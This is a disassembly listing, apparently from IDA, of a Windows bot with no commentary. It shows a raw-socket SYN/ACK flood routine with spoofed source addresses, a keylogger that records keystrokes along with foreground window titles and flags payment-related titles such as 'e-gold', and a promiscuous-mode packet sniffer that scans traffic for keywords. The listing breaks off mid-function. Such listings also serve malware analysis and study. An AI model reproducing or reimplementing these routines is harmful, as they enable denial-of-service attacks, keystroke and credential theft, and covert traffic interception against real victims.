loc_401D09: ; CODE XREF: sub_401A6D+78�j
; sub_401A6D+297�j
push [ebp+var_C]
call dword_441450 ; closesocket
pop esi
loc_401D13: ; CODE XREF: sub_401A6D+5B�j
call dword_441318 ; WSACleanup
mov eax, ebx
loc_401D1B: ; CODE XREF: sub_401A6D+3B�j
pop edi
pop ebx
leave
retn
sub_401A6D endp
; =============== S U B R O U T I N E =======================================
sub_401D1F proc near ; CODE XREF: sub_4019D1+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE95
push [esp+10h+arg_4]
mov esi, eax
call sub_41791F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41791F
mov edi, eax
call sub_417408
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_401A6D
add esp, 1Ch
test eax, eax
jnz short loc_401D6A
push 1
pop eax
loc_401D6A: ; CODE XREF: sub_401D1F+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_401D1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D79 proc near ; DATA XREF: sub_40F6F1+2E33�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, dword_421064
call edi ; GetTickCount
push eax
call sub_4173FE
pop ecx
push 0FFh
push 3
push 2
call dword_441438 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401E42
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_42340C
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401E22
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40DC10
add esp, 14h
loc_401E22: ; CODE XREF: sub_401D79+84�j
lea eax, [ebp+var_440]
push eax
call sub_40C4F7
push [ebp+var_BC]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_401E42: ; CODE XREF: sub_401D79+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_441398 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401EC0
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_4233C4
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401EA0
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40DC10
add esp, 14h
loc_401EA0: ; CODE XREF: sub_401D79+102�j
lea eax, [ebp+var_440]
push eax
call sub_40C4F7
push [ebp+var_BC]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_401EC0: ; CODE XREF: sub_401D79+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_4413F8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_401F30
lea eax, [ebp+var_440]
push offset dword_423394
push eax
call sub_4173AC
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_401F10
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40DC10
add esp, 14h
loc_401F10: ; CODE XREF: sub_401D79+172�j
lea eax, [ebp+var_440]
push eax
call sub_40C4F7
push [ebp+var_BC]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_401F30: ; CODE XREF: sub_401D79+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call dword_4413B8 ; ntohs
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_4413F8 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_401F68: ; CODE XREF: sub_401D79+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_40222C
push 28h
mov [ebp+var_2C], 45h
call dword_4413B8 ; ntohs
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_401FDB
call sub_417408
mov esi, eax
shl esi, 8
call sub_417408
add esi, eax
shl esi, 8
call sub_417408
add esi, eax
shl esi, 8
call sub_417408
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_401FF1
; ---------------------------------------------------------------------------
loc_401FDB: ; CODE XREF: sub_401D79+233�j
push [ebp+var_240]
call sub_40AFAB
pop ecx
push eax
call dword_4413F8 ; inet_addr
mov [ebp+var_20], eax
loc_401FF1: ; CODE XREF: sub_401D79+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_40200F
call sub_417408
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_402015
; ---------------------------------------------------------------------------
loc_40200F: ; CODE XREF: sub_401D79+284�j
push [ebp+var_B8]
loc_402015: ; CODE XREF: sub_401D79+294�j
call dword_4413B8 ; ntohs
mov [ebp+var_16], ax
call sub_417408
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4413B8 ; ntohs
push 12345678h
mov [ebp+var_18], ax
call dword_4413B4 ; ntohl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402065
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_4020C1
; ---------------------------------------------------------------------------
loc_402065: ; CODE XREF: sub_401D79+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402085
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_4020C1
; ---------------------------------------------------------------------------
loc_402085: ; CODE XREF: sub_401D79+301�j
lea eax, [ebp+var_1BC]
push offset aRandom ; "random"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_4020C1
call sub_417408
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_417408
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_4020C1: ; CODE XREF: sub_401D79+2EA�j
; sub_401D79+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_4413B8 ; ntohs
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_4413B8 ; ntohs
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417490
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_417490
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40B004
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417490
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_417490
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_417430
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40B004
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417490
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_44141C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4021AE
inc [ebp+arg_0]
jmp loc_401F68
; ---------------------------------------------------------------------------
loc_4021AE: ; CODE XREF: sub_401D79+42B�j
push [ebp+var_4]
call dword_441450 ; closesocket
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset dword_423324
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41792A
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_40220C
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40DC10
add esp, 14h
loc_40220C: ; CODE XREF: sub_401D79+46E�j
lea eax, [ebp+var_440]
push eax
call sub_40C4F7
push [ebp+var_BC]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_40222C: ; CODE XREF: sub_401D79+203�j
push [ebp+var_4]
call dword_441450 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset dword_4232C4
push eax
call sub_4173AC
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_40229D
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40DC10
add esp, 14h
loc_40229D: ; CODE XREF: sub_401D79+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_40C4F7
push [ebp+var_BC]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
sub_401D79 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022BD proc near ; CODE XREF: sub_402368+E2�p
; sub_402368+1A4�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = byte ptr 18h
arg_90 = dword ptr 98h
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 200h
cmp [ebp+arg_90], 0
jz short loc_40232D
push esi
mov esi, offset aEGold ; "e-gold"
loc_4022D5: ; CODE XREF: sub_4022BD+6B�j
push esi
push [ebp+arg_4]
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_40231C
push esi
lea eax, [ebp+var_200]
push [ebp+arg_0]
push offset dword_424340
push 200h
push eax
call sub_41792A
push 0
lea eax, [ebp+var_200]
push [ebp+arg_94]
push eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_8]
call sub_40DC10
add esp, 28h
loc_40231C: ; CODE XREF: sub_4022BD+25�j
add esi, 80h
cmp esi, offset dword_423BD0
jl short loc_4022D5
pop esi
jmp short loc_402364
; ---------------------------------------------------------------------------
loc_40232D: ; CODE XREF: sub_4022BD+10�j
push [ebp+arg_0]
lea eax, [ebp+var_200]
push offset dword_42433C
push 200h
push eax
call sub_41792A
push 0
lea eax, [ebp+var_200]
push [ebp+arg_94]
push eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_8]
call sub_40DC10
add esp, 24h
loc_402364: ; CODE XREF: sub_4022BD+6E�j
xor eax, eax
leave
retn
sub_4022BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402368 proc near ; DATA XREF: sub_40F6F1+49FD�o
var_920 = dword ptr -920h
var_91C = byte ptr -91Ch
var_520 = byte ptr -520h
var_4E0 = byte ptr -4E0h
var_2E1 = byte ptr -2E1h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_DC = dword ptr -0DCh
var_58 = dword ptr -58h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 920h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_920], 0
push 26h
and [ebp+arg_0], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_E0]
rep movsd
mov dword ptr [eax+94h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_91C]
rep stosd
call dword_441340 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_441354 ; GetWindowTextA
mov ebx, 200h
loc_4023C3: ; CODE XREF: sub_402368+4A0�j
push 8
nop
call near ptr 7C802442h
call dword_441340 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz loc_40253B
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_441354 ; GetWindowTextA
cmp [ebp+var_58], 0
jz loc_4024C0
lea eax, [ebp+var_2E0]
push eax
call sub_417AF0
test eax, eax
pop ecx
jbe short loc_402479
lea eax, [ebp+var_48]
push eax
call sub_417AF0
cmp eax, 1
pop ecx
jnb short loc_402479
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset dword_4243EC
push eax
call sub_4173AC
sub esp, 8Ch
lea eax, [ebp+var_48]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4022BD
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_417430
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_417430
add esp, 0Ch
loc_402479: ; CODE XREF: sub_402368+9B�j
; sub_402368+AA�j
lea eax, [ebp+var_2E0]
push eax
call sub_417AF0
test eax, eax
pop ecx
jbe loc_40253B
lea eax, [ebp+var_48]
push eax
call sub_417AF0
test eax, eax
pop ecx
jbe loc_40253B
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset dword_4243DC
push eax
call sub_4173AC
sub esp, 8Ch
jmp short loc_4024F4
; ---------------------------------------------------------------------------
loc_4024C0: ; CODE XREF: sub_402368+86�j
lea eax, [ebp+var_48]
push eax
call sub_417AF0
test eax, eax
pop ecx
jbe loc_4025E6
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset dword_4243B8
push eax
call sub_4173AC
sub esp, 88h
loc_4024F4: ; CODE XREF: sub_402368+156�j
push 26h
lea eax, [ebp+var_48]
pop ecx
lea esi, [ebp+var_E0]
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4022BD
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_417430
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_417430
add esp, 0Ch
loc_40253B: ; CODE XREF: sub_402368+6C�j
; sub_402368+120�j ...
cmp [ebp+var_58], 0
jz loc_4025E6
push 1
call dword_441384 ; GetAsyncKeyState
cmp ax, 8001h
jnz loc_4025E6
lea eax, [ebp+var_2E0]
push eax
call sub_417AF0
test eax, eax
pop ecx
jbe short loc_4025E6
call dword_441340 ; GetForegroundWindow
lea ecx, [ebp+var_520]
push 3Ch
push ecx
push eax
call dword_441354 ; GetWindowTextA
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push offset dword_4243DC
push eax
call sub_4173AC
sub esp, 8Ch
lea eax, [ebp+var_520]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4022BD
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_417430
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_417430
add esp, 0Ch
loc_4025E6: ; CODE XREF: sub_402368+164�j
; sub_402368+1D7�j ...
mov [ebp+var_4], offset dword_423BD4
loc_4025ED: ; CODE XREF: sub_402368+496�j
push 10h
call dword_441298 ; GetKeyState
movsx esi, ax
mov eax, [ebp+var_4]
mov edi, [eax-4]
push edi
call dword_441384 ; GetAsyncKeyState
test ah, 80h
jz short loc_402685
push 14h
call dword_441298 ; GetKeyState
test ax, ax
jz short loc_402636
cmp esi, 0FFFFFFFFh
jle short loc_402636
cmp edi, 40h
jle short loc_402636
cmp edi, 5Bh
jge short loc_402636
mov [ebp+edi*4+var_920], 1
jmp loc_4027F3
; ---------------------------------------------------------------------------
loc_402636: ; CODE XREF: sub_402368+2AD�j
; sub_402368+2B2�j ...
push 14h
call dword_441298 ; GetKeyState
test ax, ax
jz short loc_402661
test esi, esi
jge short loc_402675
cmp edi, 40h
jle short loc_402661
cmp edi, 5Bh
jge short loc_402661
mov [ebp+edi*4+var_920], 2
jmp loc_4027F3
; ---------------------------------------------------------------------------
loc_402661: ; CODE XREF: sub_402368+2D9�j
; sub_402368+2E2�j ...
test esi, esi
jge short loc_402675
mov [ebp+edi*4+var_920], 3
jmp loc_4027F3
; ---------------------------------------------------------------------------
loc_402675: ; CODE XREF: sub_402368+2DD�j
; sub_402368+2FB�j
mov [ebp+edi*4+var_920], 4
jmp loc_4027F3
; ---------------------------------------------------------------------------
loc_402685: ; CODE XREF: sub_402368+2A0�j
mov esi, [ebp+edi*4+var_920]
lea eax, [ebp+edi*4+var_920]
test esi, esi
jz loc_4027F3
and dword ptr [eax], 0
lea eax, [ebp+var_2E0]
cmp edi, 8
push eax
jnz short loc_4026BD
call sub_417AF0
and [ebp+eax+var_2E1], 0
pop ecx
jmp loc_4027F3
; ---------------------------------------------------------------------------
loc_4026BD: ; CODE XREF: sub_402368+340�j
call sub_417AF0
cmp eax, 1B9h
pop ecx
jbe short loc_402703
call dword_441340 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_441354 ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_4026F1
lea eax, [ebp+var_2E0]
push eax
push offset dword_42439C
jmp short loc_402746
; ---------------------------------------------------------------------------
loc_4026F1: ; CODE XREF: sub_402368+379�j
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2E0]
push eax
push offset dword_42437C
jmp short loc_402767
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402368+360�j
cmp edi, 0Dh
jnz loc_4027C5
lea eax, [ebp+var_2E0]
push eax
call sub_417AF0
test eax, eax
pop ecx
jz loc_4027F3
call dword_441340 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_441354 ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_402757
lea eax, [ebp+var_2E0]
push eax
push offset dword_424364
loc_402746: ; CODE XREF: sub_402368+387�j
lea eax, [ebp+var_4E0]
push eax
call sub_4173AC
add esp, 0Ch
jmp short loc_402776
; ---------------------------------------------------------------------------
loc_402757: ; CODE XREF: sub_402368+3D0�j
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2E0]
push eax
push offset dword_424348
loc_402767: ; CODE XREF: sub_402368+399�j
lea eax, [ebp+var_4E0]
push eax
call sub_4173AC
add esp, 10h
loc_402776: ; CODE XREF: sub_402368+3ED�j
sub esp, 98h
lea eax, [ebp+var_48]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax
lea eax, [ebp+var_4E0]
rep movsd
push eax
call sub_4022BD
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_417430
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_417430
add esp, 0Ch
jmp short loc_4027F3
; ---------------------------------------------------------------------------
loc_4027C5: ; CODE XREF: sub_402368+39E�j
cmp esi, 1
jz short loc_4027DE
cmp esi, 3
jz short loc_4027DE
cmp esi, 2
jz short loc_4027D9
cmp esi, 4
jnz short loc_4027F3
loc_4027D9: ; CODE XREF: sub_402368+46A�j
push [ebp+var_4]
jmp short loc_4027E5
; ---------------------------------------------------------------------------
loc_4027DE: ; CODE XREF: sub_402368+460�j
; sub_402368+465�j
mov eax, [ebp+var_4]
add eax, 7
push eax
loc_4027E5: ; CODE XREF: sub_402368+474�j
lea eax, [ebp+var_2E0]
push eax
call sub_417A10
pop ecx
pop ecx
loc_4027F3: ; CODE XREF: sub_402368+2C9�j
; sub_402368+2F4�j ...
add [ebp+var_4], 14h
cmp [ebp+var_4], offset dword_424304
jl loc_4025ED
cmp [ebp+arg_0], 0
jz loc_4023C3
push [ebp+var_DC]
call sub_417174
pop ecx
push 0
nop
call near ptr 7C80C058h
sub_402368 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402822 proc near ; DATA XREF: sub_40F6F1+1E5E�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_417B70
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call dword_4413B8 ; ntohs
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AFAB
pop ecx
push eax
call dword_4413F8 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_441438 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_4028F7
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_424D9C
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_4028DA
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40DC10
add esp, 14h
loc_4028DA: ; CODE XREF: sub_402822+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_40C4F7
push [ebp+var_30]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_4028F7: ; CODE XREF: sub_402822+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_446E1C[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call dword_4413E4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_40297C
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_424D58
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402958
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40DC10
add esp, 14h
loc_402958: ; CODE XREF: sub_402822+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_40C4F7
pop ecx
push edi
call dword_441450 ; closesocket
push [ebp+var_30]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_40297C: ; CODE XREF: sub_402822+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_441364 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4029FF
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_424D10
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_4029DB
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40DC10
add esp, 14h
loc_4029DB: ; CODE XREF: sub_402822+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_40C4F7
pop ecx
push edi
call dword_441450 ; closesocket
push [ebp+var_30]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_4029FF: ; CODE XREF: sub_402822+177�j
push ebx
mov ebx, offset dword_424410
loc_402A05: ; CODE XREF: sub_402822+21B�j
; sub_402822+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4413D0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_402B17
cmp [ebp+var_102AB], 6
jnz short loc_402A05
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_402A05
lea eax, [ebp+var_1028C]
push offset aPsniff_0 ; "[PSNIFF]"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402A05
mov eax, ebx
xor edi, edi
test eax, eax
jz short loc_402A05
mov [ebp+arg_0], ebx
loc_402A73: ; CODE XREF: sub_402822+26C�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402A95
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_402A73
jmp loc_402A05
; ---------------------------------------------------------------------------
loc_402A95: ; CODE XREF: sub_402822+262�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call dword_4412F4 ; ntohs
movzx eax, ax
push eax
push [ebp+var_C]
call dword_441444 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_424424[eax*8]
push off_424400[eax*4]
lea eax, [ebp+var_2B4]
push offset unk_424CC0
push 200h
push eax
call sub_41792A
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_402B05
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40DC10
add esp, 14h
loc_402B05: ; CODE XREF: sub_402822+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_40C4F7
pop ecx
jmp loc_402A05
; ---------------------------------------------------------------------------
loc_402B17: ; CODE XREF: sub_402822+20E�j
call dword_44134C ; WSAGetLastError
push eax
push offset unk_424C7C
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41792A
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_402B5D
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40DC10
add esp, 14h
loc_402B5D: ; CODE XREF: sub_402822+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_40C4F7
pop ecx
push [ebp+var_4]
call dword_441450 ; closesocket
push [ebp+var_30]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
sub_402822 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402B83 proc near ; CODE XREF: sub_402E92+20C�p
; sub_402E92+232�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_43C630, eax
mov eax, offset dword_43C630
retn
sub_402B83 endp
; =============== S U B R O U T I N E =======================================
sub_402B92 proc near ; CODE XREF: sub_402E92+2B8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aBotSniff ; "Bot sniff"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402BAC
loc_402BA8: ; CODE XREF: sub_402B92+29�j
